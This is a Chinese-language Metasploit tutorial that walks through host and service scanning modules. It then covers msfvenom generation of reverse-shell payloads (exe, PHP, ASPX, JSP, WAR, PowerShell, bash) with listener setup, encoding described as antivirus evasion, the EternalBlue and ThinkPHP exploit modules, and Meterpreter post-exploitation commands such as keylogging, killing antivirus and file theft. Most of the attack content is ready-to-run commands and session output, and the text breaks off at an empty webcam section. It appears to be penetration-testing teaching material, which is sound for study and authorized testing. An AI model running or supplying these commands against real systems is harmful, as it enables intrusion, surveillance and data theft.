Metasploit渗透框架

常见名词解释

POC : Proof of Concept ,概念证明,用来证明漏洞存在的一段代码,没有攻击性

EXP : Exploit ,利用,利用系统漏洞进行攻击的动作、方式、方法,具有攻击性

Payload :有效载荷,指 Exploit 执行成功之后,真正在系统进行执行的代码或者指令

Shellcode :一段用于利用漏洞而执行的代码,为16进制的机器码,由于其建立正向/反向 shell 而得名

Client :客户端

Team Server :服务端, C2 服务器, Beacon Payload 的控制器

Beacon :是 Cobalt Strike 运行在目标主机上的 payload , Beacon 在隐蔽信道上我们提供服务,用于长期控制受感染主机。

C2 : Command & Control Server 的简称,也就是命令与控制服务器

MSF简介

The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一

是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。

metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。

VPS手动安装metasploit

VPS空闲内存需要大于或等于2G,安装时间很长

方法一:

1
2
3
4
5
wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

chmod +x metasploit-latest-linux-x64-installer.run

./metasploit-latest-linux-x64-installer.run

方法二:

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

MSF框架结构

  • Kali-metasploit 框架目录路径

/usr/share/metasploit-framework

  1. data:包含metasploit用于存储某些漏洞、单词列表、图像等所需二进制文件的可编辑文件。
  2. documentation:包含框架的可用文档。
  3. lib:metasploit的库文件夹。
  4. plugins:用来存放metasploit的插件。
  5. scripts:用来存放metasploit的脚本,包括meterpreter及其它脚本。
  6. tools:存放多种的命令行实用程序。
  7. modules:存储metasploit的模块文件。
  • kali Metasploit 更新
1
2
3
msfconsole -v # 查看版本
apt-get update
apt-get install metasploit-framework

MSF配置数据库

Metasploit支持使用数据库来保存渗透测试过程中获取的各种数据

  • 开启 postgresql 数据库
1
service postgresql start

-
初始化 MSF 数据库

1
msfdb init

创建数据库用户: msf
创建数据库: msf
创建数据库: msf_test
创建配置文件: /usr/share/metasploit-framework/config/database.yml
创建保存MSF框架信息所需数据表

image-20231219201236517

image-20230522195442121

  • 启动 msfconsole
1
msfconsole

Msfconsole 是 Metasploit 框架用户接口,我们能通过 Msfconsole 接口使用Metasploit 中所有模块

Msfconsole 主要用于:

  1. 管理 Metasploit 数据库

  2. 管理会话

  3. 配置启动 Metasploit 模块

    image-20230522195517461

启动 msfconsole 时,MSF会使用创建的 msf 用户自动登录到 msf 数据库

  • 查看数据库连接状态
1
2
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
  • 连接到其他数据库
1
msf6 > db_connect 用户名:口令@服务器地址:端口/数据库名称

MSF命令查询

常用命令

1
2
3
4
5
6
7
8
9
10
11
show exploits – 查看所有可用的渗透攻击程序代码 
show auxiliary – 查看所有可用的辅助攻击工具
[show ]options/advanced – 查看该模块可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数

数据库管理命令

1
2
3
4
5
6
7
msfdb init             # 启动并初始化数据库
msfdb reinit # 删除并重新初始化数据库
msfdb delete # 删除并停止使用数据库
msfdb start # 启动数据库
msfdb stop # 停止数据库
msfdb status # 检查服务状态
msfdb run # 启动数据库并运行msfconsole

核心命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
?             帮助菜单
banner 显示 Metasploit banner信息
cd 更改当前工作目录
color 切换颜色
connect 与主机通信
debug 显示对调试有用的信息
exit 退出控制台
features 显示可以选择加入的尚未发布的功能列表
get 获取特定变量的值
getg 获取全局变量的值
grep 筛选以一条命令的输出
help 帮助菜单
history 显示命令历史记录
load 加载框架插件
quit 退出控制台
repeat 重复一个命令列表
route 通过一个session会话路由流量
save 保存活动的数据存储
sessions 导出会话列表并显示会话信息
set 将一个特定环境的变量设置为一个值
setg 将一个全局变量设置为一个值
sleep 在指定的秒数内不执行任何操作
spool 将控制台输出写入文件以及屏幕
threads 查看和操作后台线程
tips 显示有用的提示清单
unload 卸载框架插件
unset 取消设置的一个或多个变量
unsetg 取消设置一个或多个全局变量
version 显示框架和控制台库版本号

模块命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
advanced      显示一个或多个模块的高级选项
back 从当前环境返回
clearm 清除模块堆栈
favorite 将模块添加到最喜欢的模块列表中
info 显示一个或多个模块的详细信息
listm 列表中的模块栈
loadpath 从路径中搜索并加载模块
options 显示一个或多个模块全局选项
popm 将最新的模块从堆栈中弹出并使其处于活动状态
previous 将之前加载的模块设置为当前模块
pushm 将活动模块或模块列表推送到模块堆栈
reload_all 重新加载所有模块
search 搜索模块名称和描述
show 显示给定类型的的模块或所有模块
use 通过名称或搜索词/索引选择使用模块

作业命令

1
2
3
4
handler       启动一个payload处理程序作为job
jobs 显示和管理 jobs
kill 杀掉一个job
rename_job 重命名一个job

资源脚本命令

1
2
makerc        将从开始输入的命令保存到文件中
resource 运行存储在文件中的命令

后端数据库命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
analyze           分析关于一个特定地址或地址范围的数据库信息
db_connect 连接到一个现有的数据服务
db_disconnect 与当前的数据服务断开连接
db_export 导出一个包含数据库内容的文件
db_import 导入扫描结果文件(文件类型将被自动检测)
db_nmap 执行nmap并自动记录输出
db_rebuild_cache 重建数据库存储的模块缓存(已废弃)
db_remove 删除已保存的数据服务条目
db_save 将当前的数据服务连接保存为默认,以便在启动时重新连接
db_status 显示当前的数据服务状态
hosts 列出数据库中的所有主机
loot 列出数据库中的所有战利品
notes 列出数据库中的所有笔记
services 列出数据库中的所有服务
vulns 列出数据库中的所有漏洞
workspace 在数据库工作空间之间切换

后端凭证命令

1
creds         列出数据库中的所有凭证

开发者命令

1
2
3
4
5
6
edit          用首选编辑器编辑当前模块或文件
irb 在当前环境下打开一个交互式Ruby shell
log 如果可能的话,将framework.log分页显示到最后。
pry 在当前模块或框架上打开 Pry 调试器
reload_lib 从指定路径重新加载Ruby库文件
time 运行一个特定命令所需的时间

攻击载荷命令

1
2
3
4
check         检查一个目标是否易受攻击
generate 生成一个有效载荷
reload 从磁盘重新加载当前的模块
to_handler 用指定的有效载荷创建一个处理程序

MSF模块介绍

模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块。

Metasploit 中有以下 7 种不同的模块类型

模块名 模块功能 模块介绍
auxiliary 辅助模块 辅助渗透(端口扫描、登录密码爆破、漏洞验证等)
exploits 漏洞利用模块 包含主流的漏洞利用脚本,通常是对某些可能存在漏洞 的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类
payloads 攻击载荷 主要是攻击成功后在目标机器执行的代码,比如反弹 shell的代码
post 后渗透阶段模块 漏洞利用成功获得meterpreter之后,向目标发送的一些 功能性指令,如:提权等
encoders 编码器模块 主要包含各种编码工具,对payload进行编码加密,以便 绕过入侵检测和过滤系统
evasion 躲避模块 用来生成免杀payload
nops 空指令模块 空指令就是空操作,提高paylaod稳定性及维持大小
  • auxiliary(辅助模块)

用于辅助操作的模块,辅助模块能在渗透之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。

例如针对各种网络服务的扫描与查点、网络扫描、枚举、漏洞扫描、登录口令暴力破解、模糊测试、爬虫遍历、数据提取等

此外,辅助模块中还包括一些无须加载攻击载荷,同时往往不是取得目标系统远程控制权的渗透攻击,例如:拒绝服务攻击。

  • exploits(渗透攻击模块)

用于利用漏洞和传递有效负载的模块。利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对目标系统访问控制权的代码组件。

有远程漏洞利用、本地漏洞利用、权限提升漏洞利用、客户端漏洞利用、Web 应用程序漏洞利用和许多其他漏洞。

  • payloads(攻击载荷)

用于在利用期间执行操作的模块。攻击载荷是在渗透攻击成功后在目标系统运行的一段植入代码,通常是为渗透攻击者打开在目标系统上的控制会话连接。在传统的渗透代码开发中,攻击载荷只是一段功能简单的 ShellCode 代码,以汇编语言编制并转换为目标系统CPU体系结构支持的机器代码,在渗透攻击触发漏洞后,将程序执行流程劫持并跳转入这段机器代码中执行,从而完成 ShellCode 中实现的单一功能。

例如建立 Meterpreter 会话、反向 shell 、执行命令、下载和执行程序等。

  • post(后渗透阶段模块)

用于在拿到权限后进行后渗透利用操作的模块,例如凭证/哈希转储、本地权限提升、后门安装、敏感数据提取、网络流量隧道(代理)、键盘记录、屏幕捕获和许多其他操作。

  • encoders(编码器模块)

用于有效负载编码和加密的模块,例如 base64 、 XOR 、 shikata_ga_nai 等。这有助于混淆以规避防病毒或 NIDS (网络入侵检测系统)、 EDR (端点检测和响应)等防御。

  • evasion(规避模块)

用于规避防御的模块,例如防病毒规避、 AppLocker 绕过、软件限制策略 (SRP) 绕过等。

  • nops(空指令模块)

用于生成无害、良性的“无操作”指令的模块,例如用于填充目的、在利用期间在内存中滑动等。用来在攻击载荷中添加空指令区,以提高攻击可靠性的组件。

是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令。

在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行Shellcode时,有一个较大的安全着陆区,从而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode执行失败,从而提高渗透攻击的可靠性。

https://www.infosecmatter.com/metasploit-module-library/

MSF辅助扫描模块 - auxiliary

MSF主机发现

  • 模块路径

modules/auxiliary/scanner/discovery/

  • 搜索模块
1
search aux /scanner/discovery

image-20230522221713596

arp_sweep:使用arp请求枚举本地局域网中的所有活跃主机

udp_sweep:通过发送UDP数据包探查指定主机是否活跃,并发现主机上的udp服务。

  • 模块使用

arp_sweep 模块使用方法

1
2
3
4
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS xx.xx.xx.xx/24
set THREADS 50
run

设置好参数后输入 run 启动扫描器

image-20230523221950951

MSF服务扫描

  • 服务扫描

确定开放端口后,对相应端口上所运行的服务信息进行挖掘

  • 模块搜索

在 Metasploit 的 Scanner 辅助模块中,用于服务扫描和查点的工具常以[service_name]_version 和 [service_name]_login 命名

[service_name]_version :可用于遍历网络中包含了某种服务的主机,并进一步确定服务的版本

[service_name]_login :可对某种服务进行口令探测攻击

在MSF终端中可以输入:

1
search _version

查看所有可用的服务探测模块

在MSF终端中可以输入:

1
search _login

可查看所有服务登录口令探测模块

Telnet服务扫描

  • 模块搜索
1
search scanner/telnet

image-20230522230637307

1
2
3
4
5
telnet登录
auxiliary/scanner/telnet/telnet_login

扫描telnet版本
auxiliary/scanner/telnet/telnet_version
  • 模块使用
1
2
3
4
use auxiliary/scanner/telnet/telnet_version
set RHOSTS xxx.xxx.xxx/24
set THREADS 100
run

SSH服务扫描

1
search scanner/ssh

image-20230522230732276

1
2
3
4
5
6
7
8
ssh登录
auxiliary/scanner/ssh/ssh_login

ssh公共密钥认证登录
auxiliary/scanner/ssh/ssh_login_pubkey

扫描ssh版本测试
auxiliary/scanner/ssh/ssh_version
1
2
3
4
use auxiliary/scanner/ssh/ssh_version
set RHOSTS xx.xx.xx.x/24
set THREADS 100
run

Oracle数据库扫描

1
search scanner/oracle

image-20230522230905939

1
2
3
4
use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS xx.xx.xx.xx/24
set THREADS 50
run

SMB服务扫描

1
search scanner/smb

image-20230522231043506

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
SMB枚举
auxiliary/scanner/smb/smb_enumusers

返回DCERPC信息
auxiliary/scanner/smb/pipe_dcerpc_auditor

扫描SMB2协议
auxiliary/scanner/smb/smb2

扫描smb共享文件
auxiliary/scanner/smb/smb_enumshares

枚举系统上的用户
auxiliary/scanner/smb/smb_enumusers

SMB登录
auxiliary/scanner/smb/smb_login

扫描组的用户
auxiliary/scanner/smb/smb_lookupsid

扫描系统版本
auxiliary/scanner/smb/smb_version

1
2
3
4
5
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.111
run
db_hosts –c address,os_flavor

MSSQL服务扫描

1
search scanner/mssql

image-20230522231136485

1
2
3
4
5
MSSQL登陆工具
scanner/mssql/mssql_login

测试MSSQL的存在和信息
scanner/mssql/mssql_ping
1
2
3
4
5
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

FTP扫描

1
search scanner/ftp

image-20230522231220387

1
2
3
4
5
ftp版本扫描
scanner/ftp/ftp_version

ftp匿名登录扫描
scanner/ftp/anonymous
1
2
3
4
5
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

SMTP扫描

1
search scanner/snmp

image-20230522231318694

1
2
3
4
5
smtp枚举
auxiliary/scanner/smtp/smtp_enum

扫描smtp版本
auxiliary/scanner/smtp/smtp_version

SNMP扫描

1
search scanner/snmp

image-20230522231452958

1
2
3
4
msf> use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set THREADS 50
run

WMAP

Web应用辅助扫描,漏洞查找等模块基本都在 modules/auxiliary/ 下,Metasploit内置了 WMAP WEB 扫描器

要先创建一个数据库用来存放扫描数据,初始化 wmap

1
2
3
4
5
6
7
8
9
10
11
12
msf > load wmap
msf > help wmap
wmap Commands
=============
Command Description
------- -----------
wmap_modules Manage wmap modules
wmap_nodes Manage nodes
wmap_run Test targets
wmap_sites Manage sites
wmap_targets Manage targets
wmap_vulns Display web vulns

使用wmap扫描

1
2
3
4
5
6
msf > wmap_sites -a http://202.112.50.74 //添加要扫描的网站
msf > wmap_sites -l
msf > wmap_targets -t http://202.112.20.74 //把添加的网站作为扫描目标
msf > wmap_run -t //查看那些模块将在扫描中使用
msf > wmap_run -e //开始扫描
msf > vulns //查看漏洞信息

MSF端口扫描

模块路径

1
modules/auxiliary/scanner/portscan/

模块搜索

1
search scanner/portscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
auxiliary/scanner/protscan/ack
//通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测

auxiliary/scanner/protscan/ftpbounce
//通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能很好的防范此攻击,但在旧的系统上仍可以被利用

auxiliary/scanner/protscan/syn
//使用发送TCP SYN标志的方式探测开放端口

auxiliary/scanner/protscan/tcp
//通过一次完整的TCP连接来判断端口是否开放 最准确但是最慢

auxiliary/scanner/protscan/xmas
//一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的TCP标记检测器的过滤

一般情况下推荐使用 syn 端口扫描器,速度较快,结果准确,不易被对方察觉

  • 模块使用
1
2
3
4
use auxiliary/scanner/protscan/syn
set RHOSTS 10.10.10.10
set THREADS 20
run

MSF攻击载荷模块 - payloads

  • 模块路径

/usr/share/metasploit-framework/modules/payloads

payload 又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。

payload 模块保存在如下路径:

1
modules/payloads/{singles,stages,stagers}/

Payload类型

singles

独立载荷,可直接植入目标系统并执行相应的程序,如: shell_bind_tcp 这个payload 。

adduser 实例 (singles)

添加管理员用户,cmd执行的payload

1
2
3
4
5
6
7
search adduser
use 4
options
set user admin
set pass Admin@123
generate
generate -f

生成exe程序

1
2
3
search adduser
use 3
generate -f exe -o xxx.exe

stagers

传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为 bind 型和 reverse 型, bind 型是需要攻击机主动连接目标端口的;而 reverse 型是目标机会反连接攻击机,需要提前设定好连接攻击机的IP地址和端口号。

stages

传输体载荷,如 shell , meterpreter 等。在 stagers 建立好稳定的连接后,攻击机将 stages 传输给目标机,由 stagers 进行相应处理,将控制权转交给 stages 。比如得到目标机的 shell ,或者 meterpreter 控制程序运行。这样攻击机可以在本端输入相应命令控制目标机。

meterpreter 其实就是一个 payload ,它需要 stagers 和相应的 stages 配合运行, meterpreter 是运行在内存中的,通过注入 dll 文件实现,在目标机硬盘上不会留下文件痕迹,所以在被入侵时很难找到。

Stageless payload & Staged payload

payload分为 staged (分阶段)和 stageless (不分阶段):

1
Stageless payload: <platform>/[arch]/<single>

Stageless Meterpreter 是一个二进制文件,包含Meterpreter的所有必需部分以及所有必需的扩展全部捆绑在 一起,将完整的payload都编译在木马中,体积庞大,可直接独立地植入目标系统进行执行

1
Staged payload: <platform>/[arch]/<stage>/<stager>

Staged Meterpreter 负责建立目标用户与攻击者之间的网络连接,将执行传递到另一个阶段,MSF提供了传输器和传输体配对分阶段植入的技术,由渗透攻击模块首先植入代码,短小精悍且可靠的传输器载荷,然后在运行传输器载荷时进一步下载传输体载荷并执行,比如加载meterpreter、VNC桌面控制等复杂的大型攻击载荷。

stageless 和 staged 就像web入侵里面提到的大马和小马一样,一个功能齐全,一个只是构造一个连接或命令执行,还需通过其他工具和脚本进行管理

Playroad Staged Stageless
Reverse TCP windows/meterpreter/reverse_tcp windows/meterpreter_reverse_tcp
Reverse HTTPS windows/meterpreter/reverse_https windows/meterpreter_reverse_https
Bind TCP windows/meterpreter/bind_tcp windows/meterpreter_bind_tcp
Reverse TCP IPv6 windows/meterpreter/reverse_ipv6_tcp windows/meterpreter_reverse_ipv6_tcp

Payload生成

msfvenom简介

Msfvenom - Metasploit 独立有效负载生成器,是用来生成后门的软件,在目标机上执行后门上线。

msfvenom选项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Options:
-l, --list <type> 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, archs, encrypt, formats, all
-p, --payload <payload> 指定使用的payload(攻击载荷)。使用自定义的payload,使用`-`或者stdin指定
--list-options 列出 payload 的标准, 高级和规避选项

-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder <encoder> 指定需要使用的encoder(编码器)
--sec-name <value> 生成大型Windows二进制文件时要使用的新节名。默认值:随机4字节alpha字符串
--smallest 使用所有可用的编码器生成最小的有效负载
--encrypt <value> 适用于shellcode的加密或编码类型(使用 --list encrypt 列出)
--encrypt-key <value> 用于--encrypt的密钥
--encrypt-iv <value> --encrypt的初始化向量
-a, --arch <architecture> 用于--payload和--encoders的体系结构(使用 --list archs 列出)
--platform <platform> 指定payload使用的平台(使用--list platform列出)
-o, --out <path> 保存payload
-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
--pad-nops 将由-n指定的nopsled大小用作总有效负载大小,自动添加nopsled数量(nops减去payload长度)
-s, --space <length> 设定有效攻击荷载的最大长度
--encoder-space <length> 编码的有效负载的最大大小(默认为-s value)
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
-t, --timeout <second> 从STDIN读取有效负载时要等待的秒数(默认为30,0 为禁用)
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表

msfvenom生成payload

生成 payload ,有两个必须的选项: -p 、 -f ,使用 -p 来指定要使用的payload ,使用 -f 来指定 payload 的输出格式

  • 查看所有 MSF 可用的 payload 列表
1
msfvenom -l payloads
  • 查看 MSF 支持的输出格式
1
msfvenom -l formats
  • 查看可用平台
1
msfvenom -l platforms
  • 生成 exe 格式的 payload
1
msfvenom -p windows/meterpreter/bind_tcp -f exe -o 123.exe
  • 使用自定义的 payload

需要使用 “-“,比如:

1
cat payload_file.bin | msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw
  • 对payload进行编码

如果你使用了 -b 选项(设定了规避字符集),会自动调用编码器。

其他情况下,你需要使用 -e 选项来使用编码模块,例如:

1
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
  • 查看可用的编码器
1
msfvenom -l encoders
  • 迭代编码

使用 -i 选项进行多次编码

某些情况下,迭代编码可以起到规避杀毒软件的作用,但你需要知道,编码并没有使用一个真正意义上的AV规避方案。

1
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i  3
  • 规避字符

使用 -b 选项意味着在生成 payload 的时候对某些字符进行规避。当你使用这个选项的时候, msfvenom 会自动的使用合适的编码器对 payload 进行编码;比如:

1
msfvenom -p windows/meterpreter/bind_tcp -b \x00 -f raw
  • 使用自定义可执行文件模板

默认的, msfvenom 使用的模板文件保存在 msf/data/templates 目录中,如果你想使用你自己的模板文件,你可以使用 -x 选项来指定,比如:

1
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe

msfvenom使用实例

  • msfvenom 生成 windows 可执行程序
1
2
3
4
5
6
7
8
9
msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=192.168.41.128 lport=5445 -f exe -o 5445.exe

-p windows/x64/meterpreter/reverse_tcp:指定payload类型为windows
x64系统下运行的反向TCP连接的meterpreter
lhost=192.168.41.128:指定payload反向连接的IP地址
lport=5445:指定payload反向连接的端口号
-f exe:生成exe格式的payload
-o m1.exe:保存payload为5445.exe文件名
  • msfconsole 开启监听
1
2
3
4
5
6
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.41.128
msf6 exploit(multi/handler) > set lport 5445
msf6 exploit(multi/handler) > run
  • msfvenom 生成 payload ( web payload )
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
php:
msfvenom-p php/meterpreter/reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f raw > shell.php

asp:
msfvenom -a x64 --platform windows -p
windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4444 -
f aspx -o shell.aspx

jsp:
Msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f raw > shell.jsp

war:
msfvenom-p java/jsp_shell_reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f war > shell.war

实例:
生成payload:

1
2
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.40.132
lport=5555 -f raw -o shell_.php

创建监听器:

1
2
3
4
5
6
7
8
9
10
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.40.132
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.40.132:5555
[*] Meterpreter session 3 opened (192.168.40.132:5555 -> 192.168.40.142:49419) at 10:54:02 -0400
meterpreter > sysinfo
Computer : SOURCE-PC
OS : Windows NT SOURCE-PC 6.1 build 7600 Meterpreter : php/windows
  • msfvenom 生成 payload (脚本 payload )
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
python:
msfvenom-p python/meterpreter/reverse_tcp LHOST=192.168.2.2
LPORT=4444 -f raw > shell.py

PowerShell:
msfvenom -p windows/x64/meterpreter_reverse_http
LHOST=192.168.2.2 LPORT=4444 -f psh > shell.ps1

bash:
msfvenom-p cmd/unix/reverse_bash LHOST=192.168.2.2 LPORT=4444
-f raw > shell.sh

perl:
msfvenom-p cmd/unix/reverse_perl LHOST=192.168.2.2 LPORT=4444
-f raw > shell.pl

实例:

1
2
3
4
msfvenom -p windows/x64/meterpreter_reverse_http
LHOST=192.168.2.2 LPORT=4444 -f psh > shell.ps1

powershell.exe -ExecutionPolicy Bypass -File shell.ps1

MSF漏洞利用模块 - exploits

  • 模块路径
1
/usr/share/metasploit-framework/modules/exploits

Windows - MS17-010

1
search ms17-010

image-20230523225730301

1
2
3
4
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.3.23
check //检测目标是否存在漏洞
run //运行攻击模块

Linux - Thinkphp-RCE

search thinkphp

image-20230523225904305

1
2
3
4
5
6
7
use exploit/unix/webapp/thinkphp_rce
set rhosts xx.xx.xx.xx
set rport xxxx
set srvport xxxxxx
set lhost xx.xx.xx.xx
set lport xxxx
run

Meterpreter扩展模块

meterpreter简介

Meterpreter 是一个高级、动态、可扩展的 payload ,简单理解是一个高级的CMD ,里面封装了 Metasploit 的功能

Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻载荷能够获得目标系统的一个 Meterpreter shell 的链接。

Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

meterpreter 特点

Metasploit 提供了各个主流平台的 Meterpreter 版本,包括 Windows、Linux ,同时支持 x86、x64 平台,另外, Meterpreter 还提供了基于 PHP 和 Java 语言的实现。 Meterpreter 的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。除上述外,Meterpreter 还支持 Ruby 脚本形式的扩展。

进入meterpreter

1
2
3
background:将当前session挂起
sessions -l:列出当前所有的session
sessions -i id:进入某个session
  • 常用命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
background #放回后台
exit #关闭会话
help #帮助信息
sysinfo #系统平台信息
screenshot #屏幕截取
shell #命令行shell (exit退出)
getlwd #查看本地目录
lcd #切换本地目录
getwd #查看目录
ls #查看文件目录列表
cd #切换目录
rm #删除文件
download C:\\1.txt 1.txt #下载文件
upload /var/www/wce.exe wce.exe #上传 文件
search -d c: -f *.doc #搜索文件
execute -f cmd.exe -i #执行程序/命令
ps #查看进程
getuid #查看当前用户权限
run killav #关闭杀毒软件
run getgui-e #启用远程桌面

meterpreter常用shell

reverse_tcp

基于TCP的反弹shel

1
2
linux/x86/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp

bind_tcp

基于TCP的正向连接shell,因为在内网跨网段时无法连接到攻击者的机器,所以在内网中经常会使用,不需要设置LHOST

1
linux/x86/meterpreter/bind_tcp

reverse_http

基于http方式的反向连接,在网速慢的情况下不稳定

1
windows/meterpreter/reverse_http

reverse_https

基于https方式的反向连接,在网速慢的情况下不稳定

1
windows/meterpreter/reverse_https

meterpreter命令详解

核心命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
?           – 帮助菜单
background – 将当前会话移动到后台
bg - background的别名
bgkill – 总之后台 meterpreter 脚本
bglist – 列出后台运行中的脚本
bgrun – 作为一个后台线程运行脚本
channel – 显示活动频道
close – 关闭通道
disable_unicode_encoding - 禁用unicode字符串的编码
enable_unicode_encoding - 启用unicode字符串的编码
exit – 终止 meterpreter 会话
help – 帮助菜单
info - 显示有关Post模块的信息
irb - 在当前会话上打开交互式 Ruby 外壳
load - 加载一个或多个meterpreter扩展
machine_id - 获取连接到会话的计算机的 MSF ID
migrate - 将服务迁移到另一个进程
pivot - 管理pivot侦听器
pry - 打开当前会话上的pry调试器
quit - 终止 meterpreter 会话
read - 从通道中读取数据
resource - 运行存储在文件中的命令
run - 执行一个meterpreter 脚本 或者 Post模块
secure - 在会话中协商TLV分组加密
sessions - 快速切换到另外一个session
set_timeouts - 设置当前会话的超时值
sleep - 强制meterpreter停止活动,然后重新建立会话
transport - 改变目前的运输机制.
use - 加载 meterpreter 的扩展,'load'的旧别名
uuid - 获取当前会话的UUID
write – 将数据写入到一个通道

文件系统命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
cat         - 读取并输出到标准输出文件的内容
cd - 更改目录对受害人
checksum - 检索文件的校验和
cp - 将源复制到目标
dir - 列出文件(别名为 ls)
download - 下载文件或目录
edit - 编辑文件
getlwd - 输出本地工作目录
getwd - 输出工作目录
lcd - 更改本地工作目录
lls - 列出本地文件
lpwd - 输出本地工作目录
ls - 列出当前目录中的文件列表
mkdir - 创建目录
mv - 将源移动到目标
rm - 删除指定的文件
rmdir - 删除目录
search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\\ -f *.doc 在目标主机C盘下搜索doc文档
show_mount - 列出所有装载点/逻辑驱动器
upload - 上传文件或目录

网络命令

1
2
3
4
5
6
7
8
9
arp         - 显示主机ARP缓存
getproxy - 显示当前代理配置
ifconfig - 显示网络接口的关键信息
ipconfig - 显示网络接口的关键信息
netstat - 显示网络连接
portfwd - 将本地端口转发到远程服务
例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口
resolve - 解析目标上的一组主机名
route - 查看或加入受害者路由表 route add 5.5.5.0 255.255.255.0 1 用sessions 1会话加入指定网段

用户界面命令

1
2
3
4
5
6
7
8
9
10
11
12
13
enumdesktops    - 列出所有可访问的desktops和Windows
getdesktop - 获取当前的 meterpreter 桌面
idletime - 检查长时间以来,受害者系统空闲进程
keyboard_send - 发送一个键盘记录器
keyevent - 发送key事件
keyscan_dump - 转储键盘记录器缓冲区内容
keyscan_start - 启动键盘记录器
keyscan_stop - 停止键盘记录器
mouse - 发送鼠标事件
screenshare - 实时监视远程用户的桌面
screenshot - 抓取交互式桌面的屏幕截图
setdesktop - 更改 meterpreter 当前桌面
uictl - 启用用户界面组件的一些控件

摄像头命令

1
2
3
4
5
